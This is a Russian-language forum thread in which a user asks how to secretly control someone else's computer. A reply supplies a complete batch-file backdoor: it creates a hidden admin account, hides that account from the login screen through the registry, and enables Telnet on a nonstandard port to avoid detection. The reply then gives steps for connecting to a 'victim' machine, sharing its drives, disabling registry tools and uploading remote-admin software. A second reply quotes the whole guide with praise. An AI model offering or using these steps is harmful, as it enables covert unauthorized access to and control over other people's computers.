[Обсуждение] Удаленный доступ

[vorobey1]

я знаю что есть программы которые с помощью которых я могу лазить в чужом компе, но не знаю есть ли такие через которые пользователь не видит что я делаю, есть ли такие? желательно названия + небольшой гайд

заранее благодарен

[mirex0124]

Что бы не видел тебе Telnet (напиши в командной строке).


все это пишешь в блокноте, и сохраняем как *.bat

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet



Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add - не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM , редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.

теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.

. А чтобы знать когда твой "друг"
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключится. Для этого можешь выбрать стандартный виндосовский
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*================================================= ====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================= ====
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)



Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.


Взломщик ЭТсамое...

[sanaka2011(1)]

Цитата: Сообщение от mirex0124 Что бы не видел тебе Telnet (напиши в командной строке). все это пишешь в блокноте, и сохраняем как *.bat chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet Теперь пояснения: chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке. net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server. net user hacker hack /add и net localgroup Администраторы hacker /add - не трудно догадаться, что этими командами создаётся новая учетная запись с админскими правами, где логин: hacker пасс: hack Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав рег файл в реестр, следующего содержания: Содержимое conf.re Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "hacker"=dword:00000000 Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= auto которая меняет тип его запуска на автоматический(по дефолту disabled ). При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это палевно, поэтому советую прописывать этой командой tlntadmn config port=972 sec=-NTLM , редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet окончательно запустит наш бэкдор. теперь проверим правильный ли синтаксис кода. Открываем командную строку, если она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код, запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так: Пуск -> Выполнить -> пишем services.msc -> Ok Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и смотришь её свойства. При необходимости в любой момент можно её отключить. . А чтобы знать когда твой "друг" в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. Осталось подключится. Для этого можешь выбрать стандартный виндосовский клиент который находится тут c:WINDOWSsystem32telnet.exe. Запускаешь. Пишешь: Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт] если пишет: Welcome to Microsoft Telnet Service login:_ то всё акей =)) Вводишь: login: hacker password: hack Появляется надпись: *================================================= ==== Вас приветствует Telnet-сервер производства корпорации Майкрософт *================================================= ==== C:>_ Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь управлять кампом, отдавая команды... Можно к примеру расшарить диски: C:>net share disk_c=c: > nul C:>net share disk_d=d: > nul C:>net share disk_e=e: > nul перезагрузить комп: C:>shutdown -r -t 1 -c -f прописать какой-нибудь ключ реестра: C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему или поднять ftp сервер и залить радмина для более удобного удаленного администрирования: C:>ftp В общем-то, здесь уже играет фантазия взломщика =) Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире. Взломщик ЭТсамое...

+100500% тема класс !!!

[ALEGARik]

О_О а это на win7 прокатит?